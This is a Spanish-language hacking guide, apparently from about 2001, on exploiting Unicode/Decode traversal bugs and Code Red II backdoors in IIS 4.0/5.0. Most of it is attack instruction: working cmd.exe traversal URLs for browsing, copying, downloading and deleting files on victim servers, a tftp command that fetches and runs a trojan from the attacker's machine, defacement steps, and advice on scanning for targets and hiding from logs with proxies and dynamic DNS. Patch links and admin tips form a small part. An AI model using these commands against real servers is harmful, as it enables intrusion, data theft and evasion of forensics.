- UNICODEX v3.0 -
____________________

“Cuando los chicos dejaron de lado los trojanos...”

Guía de aprendizaje:Explotación, administración y prevención en plataforma Win32 de los Bug transversal
UNICODE, DECODE, Server atacado por el Red Code Worm II, Sensepost.exe, y similares bugs o backdoors
dados en Plataformas IIS 4.0 y 5.0 - NT & Win2k.- 

by CyRaNo  www.heinekenteam.com 

                            INDICE General: 
Prólogo

  1 Unicode
  . Historia
  . Variantes

  2 Decode
  . Historia
  . Variantes 

  3 Red Code Worm II
  . Historia
  . Variantes

  4 Sensepost.exe o cmd1.exe
Que son, herramientas complamentarias, exploits y tetras.

  5 Agregados a modo de Tips:
0- Como encontrarlos y explotarlos
1. Recorriendo/reconociendo el territorio –Inside-
2. Trucos, consejos & comandos
3. Cuidados, proxy y cuenta dinámica
4. Exploits
5. Borrando logs
6. Parches, prevenciones y Utilidades de reparación

  - 10 Tips post intrusión [Administradores ]
  - Algunos rígidos interesantes
  - URLs recomendadas

Final

Download esta Guía aquí   387 KB

Prólogo :

Actualmente en el planeta aproximadamente el 50% de los servidores Microsoft IIS 4.0 y 5.0 estan afectados por estas fallas y millones de personas no saben que alguien literalmente se les adueño de la máquina ( Quizá nunca lo sepan ) Este texto es para que muchos se den cuenta del riesgo de seguridad informática que hay, incluso en mi país que casi no existe o no muchos estan capacitados como para ser un buen administrador y tambien está hecho para aquellos curiosos... La culpa no es toda del niño que rompe, la culpa esta tambien en el mal administrador y principalmente en el que publica un OS defectuoso. Y todos tienen excusas. El niño: “Porque no sabia lo que hacia”, el administrador “Porque a eso no me lo enseñaron en la facultad” y la corporacion del OS: “Se nos vencieron los plazos de tiempo y presupuesto, asi que tuvimos que sacar y presentar el producto como estaba...” Bueno, asi que con este .doc el niño va a aprender sin romper, el administrador va a saber prevenirse, actualizarse, reparar y el corporativo quizá vaya  a destinar mas dinero de marketing en el desarrollo del software. Amén.

“Dios se manifiesta en un sueño al Papa, Bill Clinton y a Bill Gates. Les dice:
"Les tengo una noticia buena y una mala. La buena es que Yo existo. La mala es que la tierra será destruída en 30 dias". 
El Papa despierta a sus colaboradores y les dice: "Les tengo dos noticias buenas. La primera es que hemos estado en lo correcto durante todo este tiempo, Dios existe. La segunda es que estaremos en el cielo en 30 dias".
Bill Clinton despierta a sus colaboradores y les dice: "Les tengo una noticia buena y una mala. La buena es que Dios existe y está de nuestro lado. La mala es que el mundo terminará en 30 dias".
Bill Gates despierta a sus colaboradores y les dice: "Les tengo una noticia buena y una noticia maravillosa. La noticia buena es que Dios piensa que soy una persona importante. La noticia maravillosa es que no tendremos que escuchar ninguna otra queja sobre Bugs en Windows XP hasta dentro de 30 dias ”

Unicode:

- Historia -

Microsoft da aviso de un patch según ellos de error CGI

Microsoft Security Bulletin (MS00-078)

Patch Available for “Web Server Folder Traversal” Vulnerability

Originally posted: October 17, 2000

Summary

Microsoft has identified a security vulnerability in Microsoft® IIS 4.0 and 5.0 that is eliminated by a previously-released patch. The vulnerability could potentially allow a visitor to a web site to take a wide range of destructive actions against it, including running programs on it.

There is not a new patch for this vulnerability. Instead, it is eliminated by the patch that accompanied Microsoft Security Bulletin MS00-057 . Customers who have applied that patch are already protected against the vulnerability and do not need to take additional action. Microsoft strongly urges all customers using IIS 4.0 and 5.0 who have not already done so to apply the patch immediately.

- Los Chinos expertos de Nsfocus dan aviso tambien de esta grave falla -

Oct 20 ,2000
NSFOCUS security team has found a security flaw in Microsoft IIS 4.0/5.0 UNICODE decoding implementation. Exploitation of this vulnerability, It is possible that a malicious user can run arbitrary command or get the content of system file in the web server running vulnerable IIS remotely.

www.nsfocus.com/english/homepage/sa_06.htm

. Explicaban de esa manera cada detalle de este tremendo agujero de seguridad, veamos la traducción que hizo la lista de correo Hispasec:  www.hispasec.com/unaaldia.asp?id=726

- Variantes -

Precediento el server de un de estas variantes como por ejemplo: www.server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ deberia listar el contenido del disco c: en el caso de que estuviera vulenerable a dicho bug. Podrán ver esto con solo ir al sitio de Alex en donde hay muchos servers vulnerables y un scan online para dicha vulnerabilidad:  http://inet.delphicomp.com/hack/

Decode:

---------                

- Historia -

- Variantes -

Precediento el server de un de estas variantes como por ejemplo:

www.server.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

deberia listar el contenido del disco c: en el caso de que estuviera vulenerable a dicho bug. Podrán ver esto copn solo ir al sitio de Alex en donde hay muchos servers vulnerables y un scan online para dicha vulnerabilidad:  http://inet.delphicomp.com/hack/ - temporalmente caida -

Red Code II:

- Historia -

5/08: Avisamos en el boletín del sitio sobre la aparición de la 2da versión:

- La caja de Pandora se abrió -

- Variantes -

La más usual por el momento son estas, se desconocen otras variantes así directas.

www.server.com/scripts o msadc/root.exe?/c+dir+c:\ este es el backdoor que deja el paso del Code Red II.

. El Red Code II deja una entrada a traves del renombrado cdm.exe ( con el cmd.exe renombrado a root.exe cualquier niño poniendo en su browser el siguiente string podra listar el rigido c en su monitor server/scripts/root.exe?/c+dir+c:\ y aplicar a raiz de ello comandos ms-dos tal como habiamos visto hace tiempo aqui: www.heinekentam.com/cursos/iis )

Claro, ahora entiendo los Bugs de Microsoft... Hippies... fumemos algo y hagamos un Sistema Operativo, que les parece ?

Sensepost.exe, cmd1.exe:

- Que son -

Son CMD.exe renombrados [Ya sea por el administrador o un atacante que antes a pasado por ahí] o bien archivos en los cuales se pueden usar como backdoor ejecutando comandos remotos Ms-dos tal como vimos en el server que fue vulnerado por el Code Red.-

Se explota de idéntica manera que el Unicode, Decode, Code Red, etc...

-          Herramientas Complementarias / Exploits -

Sin dudas usar el Urlscan de SSH como en los casos anteriores con la debida configuración o alguna tetra que pasare a explicar simplemente ahora.

- Treta Google -

Hasta el utilisimo buscador Google sirve para buscar vulnerabilidades cgi no sabias ?

E sta es la sintáxis para listar el directorio del disco rigido c:

[ Este administrador fue avisado en repetidas veces del bug pero nunca obtuve respuesta.]

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

- Como encontrarlos -

Estan en todos lados, nadie parece haberse enterado de esto... debajo de las baldozas, con un MacCombo viene ahora un UNICODE/DECODE/RED CODE 2/o algun cmd.exe renombrado para ejecutar y meterse dentro de la maquina con comandos ms-dos o en las tapitas de gaseosas suele estar tambien.

Recomendado usar Windows e Internet explorer Browser para facilitar esto ( Pareceria que los bugs y los software de la misma firma se llevan muy bien. ) O bien 1ro la gran Script Kiddie ( scaneando rangos ) o como 2do target definido. 1ro Los rangos de IP a scanear facilmente los resolves on algun mail de la empresa que quieras scanear, amigo con esa conexión de tal firma a scanear o sino haces un whois en ARIN y asi obtendras los rangos a scanear serialmente al azar ( O no tanto, podes optar por el de cierta firma con redes online ) – En las maquinas puede haber sitios o data, ten mucho cuidado - 2do Elegis la maquina y le probas todas las variantes hasta que logras ver en tu pantalla el arbol de directorios. Si no lo ves, mala suerte y a estudiar jardineria.

Usar la tetra de Google servira como asi tambien barrer la red con el URLscan o herramientas que hayan sacado como ser el buscador de code red de Eeye.com

/scrips/root.exe?/c+dir+*.a Si en el scanner del SSH Team buscan con ese string van a dar con los IIS ya atacados por la ultima version del Red Code. ( Se explotan de la misma manera que los unicode/decode www.heinekenteam.com/cursos/iis - Admin Patcheen sus IIS. ( 4to aviso a los admin )

( /scrips/root.exe?/c+dir+*.a )

Esa linea es para reemplazarla en el programa URLScanner* y detectar el servidor atacado por la segunda version del R/C, por otro lado puedes Optar por el scan que puso a disposicion la firma Eeye incluida en este .zip* para ver tus redes... pero de disponer de presupuesto te recomendaria los productos de Eeye www.eeye.com y de no tenerlos www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/iis/ deploy/depovg/securiis.asp

Tambien esta la siguiente opción: [ Valerse de los Logs de otras maquinas para ver que maquina infectada paso por alli scaneando ]

He visto el tremendo potencial y rapidez que tiene este gusano, ya sea traduciendo o leyendo como ser el analisis de Eeye, Russ, Elias y varios de Bugtraq... y algo que me sorprendió por lo que en sí significa poner a disposicion de un intruso, es la informacion sencible que se brinda al visualizar el .log de un server atacado y los request que alli figuran de muchos otros servers vulnerables que han pasado por ahi scaneando la tipica vulnerabilidad empleada ( MS Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability Associated Bugtraq ID: 2880 ) La lista interminable de maquinas esclavas/infectadas y totalmente vulnerables que han pasado scaneando por alli estaban en ese log a merced de cualquier "Script Kiddie", Red Code es sin dudas una caja de pandora para la raza de *Assholes ( *Administradores supuestamente seguros hacen operar lamentablemente esos servers ) Esto es un fragmento de .log que vi hace instantes:

#Software: Microsoft Internet Information Server 4.0 #Version: 1.0 #Date: 2001-08-05 00:16:31 #Fields: time c-ip cs-method cs-uri-stem sc-status 00:16:30 XXX.207.122.54 GET /default.ida 200 00:18:31 XXX.146.132.42 GET /default.ida 200 00:59:56 XXX.206.17.27 GET /default.ida 200 01:24:01 XXX.21.68.37 GET /default.ida 200 01:40:57 XXX.21.68.37 GET /default.ida 200 01:48:25 XXX.253.224.8 GET /default.ida 200 01:51:16 XXX.99.237.136 GET /default.ida 200 02:03:01 XXX.1.139.12 GET /default.ida 200 02:25:07 XXX.76.150.154 GET /default.ida 200 02:34:29 XXX.1.139.12 GET /default.ida 200 02:53:23 XXX.177.43.133 GET /default.ida 200 02:54:58 XXX.29.39.121 GET /default.ida 200 02:56:52 XXX.51.43.42 GET /default.ida 200 03:02:54 XXX.48.93.170 GET /default.ida 200 .........etc etc etc etc

Comprobé con efecto positivo de que todos ellos ante el string y request en mi browser IE ( server/scripts/root.exe?/c+dir+c:\ ) listaban el contenido del rigido C: con el peligro que ello significa para la maquina remota.

English for Incidents/Securityfocus - Subject: Very sensible data in Red Code 2's victim Log server.

I've seen the tremendous potential and speed this worm has, either translating or reading like in the Eeye, Russ, Elias and some of Bugtraq analysis... and something that astonished me for what it means itself to make available to an intruder, is all the sensible information provided when you visualize the .log of an attacked server and the requests in there from many other vulnerable servers which have been through scanning the typical used vulnerability ( MS Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability Associated Bugtraq ID: 2880 ) The endless list of infected and totally vulnerable slave machines which have been scanning through were in that log available to any "Script Kiddie", Red Code is no doubt a Pandora Box for neglected administrators. This is a fragment of the .log I just saw:

#Software: Microsoft Internet Information Server 4.0 #Version: 1.0 #Date: 2001-08-05 00:16:31 #Fields: time c-ip cs-method cs-uri-stem sc-status 00:16:30 XXX.207.122.54 GET /default.ida 200 00:18:31 XXX.146.132.42 GET /default.ida 200 00:59:56 XXX.206.17.27 GET /default.ida 200 01:24:01 XXX.21.68.37 GET /default.ida 200 01:40:57 XXX.21.68.37 GET /default.ida 200 01:48:25 XXX.253.224.8 GET /default.ida 200 01:51:16 XXX.99.237.136 GET /default.ida 200 02:03:01 XXX.1.139.12 GET /default.ida 200 02:25:07 XXX.76.150.154 GET /default.ida 200 02:34:29 XXX.1.139.12 GET /default.ida 200 02:53:23 XXX.177.43.133 GET /default.ida 200 02:54:58 XXX.29.39.121 GET /default.ida 200 02:56:52 XXX.51.43.42 GET /default.ida 200 03:02:54 XXX.48.93.170 GET /default.ida 200 ........

I verified with a positive effect that all of them before the string and request in my IE browser ( server/ scripts/root.exe?/c+dir+c:\ ) listed the hard disk C: contents, with the danger it means for the remote machine. CyRaNo www.heinekenteam.com Carpe Noctem  PS: Don't forget that inside every logged machine there is another .log... The legend of the rice grain and the chess board came to my mind, regards to all. gtz to Maika.

__________________________________________________

Herramientas complementarias:

Estas herramientas las voy a remomendar porque son de muy buena ayuda para encontrar estos BUGS  ayudar a explotarlos de manera segura, rapida y bien.

. URLscaner del SSH team ----- Scan exclusivo de UNICODE, excelente a mi gusto, poseo la release que no es publica que tiene unas utilidades que te hacen aun mas comodo encontrar dicha falla.

. Shadowscan ---- Editas el archivo cgi.txt y le agregas todas las variantes. Eligiendo el rango 0-255 va a ser rapido y 7 veces mas rapido y efectivo que la tool anterior. Ademas tiene un desencriptador de claves ftp muy eficaz

. Sharesniffer: Tiene como utilidad practica la busqueda por palabra o ip del rango que quieras y te ahora no ir al sitio de ARIN para no hacer tal tramite, luego el fin del programa es otro pero no viene al caso.

. Proxis: Usar los proxys que se publican en www.cyberarmy.com en la seccion portal, son los mas actualizados dia a dia y funcionan --- Los de www.void.ru son aun mejores.-

. LC3: Desencripta los ficheros SAM

http://www.atstake.com/research/lc3/application/lc3setup01.exe

En el CD de Hteam hay 30 herramientas mas para Utilizar, mas adelante las linkeare a este texto para que todos las tengan, la mayoria de industria casera o programada por members del sitio.

www.heinekenteam.com/cd

[ Reconociendo el terreno: Una vez adentro ]

Podes optar como primera instancia buscar todos sus rigidos:

dir+c:\ lo vas reemplazando por dir+d:\ dir+e:\ dir+f:\ dir+g:\ hasta Z

-                    He visto rigidos en q: y hasta en p:, nunca se sabe.

-                    Hasta puede pasar de que a veces no se lista el directorio c: y si otros:

( Servidor reportado como vulnerable el 21/3 4.06pm y ya esta reparado. )

Para escalar directorios \etc\etc\etc se utiliza la barra “\” ( ALT 92 )

Trucos y comandos...

Se basa en comandos DOS de ejecucion remota.

. Caca.mdb lo usaremos como base de datos ejemplo

. Caca.txt lo usaremos como archivo de texto ejemplo

Crear directorio: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?

/c+md+c:\Administrador_arregla_esto 

Escribir en un .txt:

/C+echo+loquesea+>c:\etc.txt

Copiar: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+

c:\caca.mdb

Bajar: Se copia primero el archivo y luego pones esto: http://server/msadc/caca.mdb y bajara 

automaticamente.

Borrar: http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+

c:\caca.mdb 

Ver txt : http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+

c:\caca.txt 

Para mas comandos ver la seccion URLs interesantes 
para tomar un clase completa de comandos MS DOS.-

Aprovechando el bug Unicode para subir
archivos a un servidor IISx usando TFTP ( Fixed )

Como ya sabemos, la vulnerabilidad "Web Server Folder Traversal" (también conocida como Bug Unicode) de los servidores IIS4 y IIS5 de Microsoft permite ejecutar comandos y/o programas en el servidor remotamente.
De esta forma es posible "navegar" el servidor en una especie de Modo DOS (sobre todo si el administrador tiene el cerebro tan muerto como para no negar el acceso a ciertas zonas del server), ejecutar programas e incluso borrar archivos o directorios.
Pero lo que parece casi imposible es poder subir archivos al servidor. Si pudiesemos subir archivos podríamos, por ejemplo, subir scripts ASP (o CGI/PHP si el servidor los soporta) que nos permitan tener más control sobre el servidor, o mejor aún, podríamos subir y ejecutar troyanos en el servidor para ganar mayores privilegios.

Y como podrán haber adivinado por el título de este mini-tutorial, esto es posible gracias a tftp.exe, una utilidad que viene con WinNT y Win2K que nos permiten transferir archivos a través del protocolo TFTP (Trivial FTP).
No vamos a entran en detalles sobre cómo funciona el protocolo TFTP, pero sí debe quedar en claro que no es compatible con el protocolo FTP.

Manos a la obra

Lo primero que tendremos que hacer es conseguir un daemon TFTP e instalarlo en nuestra máquina. Si usan Linux es muy probable que tengan un daemon TFTP por algún lado, así que sólo tendrían que instalarlo y configurarlo.
Si usan Win32 pueden conseguir el TFTPD32 (Trivial FTP Daemon) en membres.tripod.fr/phjounin/P_tftpd32.htm

Lo único que necesitarán configuar en el TFTPD32 es el directorio base (es decir, el directorio en el que están los archivos que luego subiremos al servidor).

La sintáxis que debemos usar el la siguiente:

etc etc/system32/cmd.exe?/c+tftp+"-i"+TU.IP.VA.AQUÍ+GET+sub722.exe+C:\inetpub\scripts\sub722.exe fixed by CyRaNo*

Se puede usar un file alojado en algun FTP o maquina ajena.  [*]

( Acá les puse bien la sintaxis para que no me llenen la casilla preguntando por ello, la anterior estaba truncada a propósito... asegúrense de tener corriendo el Tftp y que este este bien configurado su Base directory, si su trojan server a subir esta en el escritorio, en Settings pongan C:\WINDOWS\Escritorio )

Se ejecuta asi: http://server/scripts/sub722.exe

Explicación:

Listo. Si todo sale bien ahora están en condiciones de subir archivos a servidores NT con el bug Unicode.

Para tener en cuenta
Algunos servidores tienen deshabilitado el port 69 (el que usa el protocolo TFTP) o tienen alguna tipo de protección que impide que la conexión se realice con éxito. Por este motivo en algunos servidores no podrán aprovechar esta vulnerabilidad (al menos no de esta forma).
Si el daemon TFTP les indica que el pedido de download fue efectuado, pero ven que el archivo "no se va", lo más probable es que no puedan transferir el archivo.

Cuando un servidor remoto permite transferir archivos a través de TFTP, los archivos no tardarán más de uno o dos segundos en empezar a transferirse, así que si ven que pasan los segundos y el archivo "no se va" dense por vencidos e intenten en otro servidor

Consejos
Como ya deben saber, para evitar ser "rastreados" (o más bien, para hacer más dificil el rastreo) siempre es conveniente usar un servidor proxy. Si usan un proxy en los logs del IIS aparecerá el IP del proxy server, y no el de ustedes. Ok, esto ya es sabido, pero ¿a qué viene todo esto?
A que si a la hora de transferir archivos usan su IP como server TFTP, el servidor proxy no les servirá de nada, ya que su IP quedará logueado en los logs del IIS, junto con la hora, y el archivo que transfirieron al servidor.
Para evitar esto lo mejor es abrir una cuenta en alguno de esos servicios de DNS dinámico (en adelante, "cuenta de DNS dinámico", por más que esté mal) como www.dhs.org, especialmente para esto. Luego consiganse algún programita que les actualice el IP automáticamente.
etc etc "-i"+micuenta.dhs.org+GET+archivo.ext+C:\destino\archivo.ext
Para que todo esto tenga alguna utilidad es muy importante que cada vez que no usen la cuenta de DNS dinámico setéen su IP como, 1.1.1.1, por ejemplo, o alguna otra cosa. De esta forma, si alguien los descubre, y mirá en los logs, lo que encontrarán será el IP del proxy y la dirección de la cuenta DNS dinámico. Si intentan conseguir su IP a través de la cuenta de DNS dinámico, llegarán al IP 1.1.1.1, a menos que se hayan olvidado de setear el IP a 1.1.1.1 o que justo en ese momento ustedes estén usando la cuenta.

The End. [Nota cedida especialmente]

Rubender pepedopo@bigfoot.com 

Arriba: proceso de Upload

Para saber tu ip, ve a Inicio---ejecutar y pon command.com  o cmd.exe y luego

lo que esta en la pantalla  es lo que vas a ver, tu IP entre ellas.

Como escribir un archivo en el server o hacen los "hackers" un defacing escrito común.

1er paso: copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe

2do Paso: etc/system32/cmd1.exe?/c+@echo%20Acá%20estuvo%20Kevin%20Mitnick+>c:\inetpub\wwwroot\

index.htm o .txt o .asp 

Data... directorios mssql7, mssql, sql, db, data, database, backup, bkp, mdbdata, los con extencion .mdb
los veras en access tranquilamente...Para escalar un directorio con dos palabras por ejemplo: mis documentos

Pones:  dir+c:\”mis documentos”  ( entre comillas ) y enter y estaras ahí...

y para bajar una archivo una vez copiado entre comillas, lo dejas SIN las comillas y bajara.

El SAM esta donde esta siempre... 

Exploits: ( Nunca viene de mas un par de recursos + )

www.securityfocus.com/data/vulnerabilities/exploits/iis-zang.c

www.securityfocus.com/data/vulnerabilities/exploits/iis-zang.exe

www.securityfocus.com/data/vulnerabilities/exploits/iis-zang.obsd

www.securityfocus.com/data/vulnerabilities/exploits/iis-zang.linux

www.securityfocus.com/data/vulnerabilities/exploits/unicodecheck.pl

www.securityfocus.com/data/vulnerabilities/exploits/unicodexecute.pl

www.securityfocus.com/data/vulnerabilities/exploits/unicodexecute2.pl

www.securityfocus.com/data/vulnerabilities/exploits/iisuni.c

Parches para reparar estos Bugs:

Unicode:

IIS 4.0

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

IIS 5.0

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Decode:

Microsoft IIS 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787

Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764

*Aviso para el administrador: Una vez adentro elegi el idioma de tu version he instalalo normalmente quedando asi solucionado la falla crítica.

Code Red Fix: www.heinekenteam.com/cursos/code.htm

Sensepost, cmd1.exe: Borrar estos files.

EXTRAS:   Consejos para los administradores de plataformas Windows:

Luego de un ataque con intrusión lograda en su server bajo IIS/NT:

Chequear la posible existencia de estos archivos...

cmd.exe         236,304

cmds.exe        236,304

dl.exe          5,120

root.exe        208,144

root.exe        236,304

server.exe      118,784

testing.exe     208,144

testing.exe     236,304

upload*.asp     (varios)

*.bat           (varios)

kill.exe 

Y algunos mas que les parezcan extraños, no dudar en borrarlos luego de analizarlos... 

10 Tips post Intrusión [ Para los administradores de plataformas Windows ]

1-       Mire si estan corriendo servicios extraños en su server y en el caso de que asi sea saquelo

2-       Scanee con un antitroyanos como ThE Cleaner : www.moosoft.com

3-       Scanee con un antivirus como Norton 2002 www.symantec.com

4-       Patchee el server con el correspondiente hotfix www.windowsupdate.com

5-       Trate de no tener daemons corriendo si no los utiliza

6-       Borrar las carpetas de ejemplos por defecto

7-       Por ultimo cambie todas sus claves y reubique las carpetas del sitio

8-       Suscribase a Microsoft para estar enterado de las fallas que se descubren y repararlas

9-       Utilice algun producto de eeye.com o algun firewall para mayor seguridad

10-   Analice el log, si ve algun daño o robo en su server y la ip atacante es nacional denunciela a su ISP,
en el caso de ser data muy sencible a la policia [ Ej: Inteligencia, habeas data, espionaje industrial ]
Si le deformaron un simple sitio, no vale la pena hacer nada...
siga este listado de consejos y mande a estudiar al administrador.

Suscribase a www.heinekenteam.com si no lo hizo. 
[ Como opción tiene el servicio de chequeos de vulnerabilidades de servers de excelentes
 empresas como Core-SDI, Sybsec o bien nosotros que nos especializamos en plataformas Windows ]

"To turn $100 into $110 is work. To turn $100 million into 
$110 million is inevitable" -- Edgar Bronfman

Rigidos Interesantes:

www.heinekenteam.com/miscelaneas/feedback.htm  [ Algunos de los que reporté y se repararon ]

10 Sitios Totalmente Recomendados:

www.infosyssec.com/index.html

www.securityfocus.com

www.void.ru

www.startplaza.nu

www.whitehats.com

www.cert.org

www.securiteam.com

project.honeynet.org

secinf.net

packetstormsecurity.org

En síntesis, todos estos bug se explotan de la misma manera. De ahí el este .doc

No se crean que he escrito todo sobre explotar desde un browser + un cmd, más adelante agregaré mucho mas... y pensar que esto es una infima parte de las maneras más fáciles de intrusión... o de estar vulnerable y potencialmente expuesto.

Carlos Tori  [ CyRaNo ]

www.heinekenteam.com

Security Online – Aficionados a la Seguridad Informática

Publicar donde sea siempre nombrando la fuente sin retocar nada, ni tomar partes de este para otro fin, ya sea para una nota o site sin autorización del previa del autor.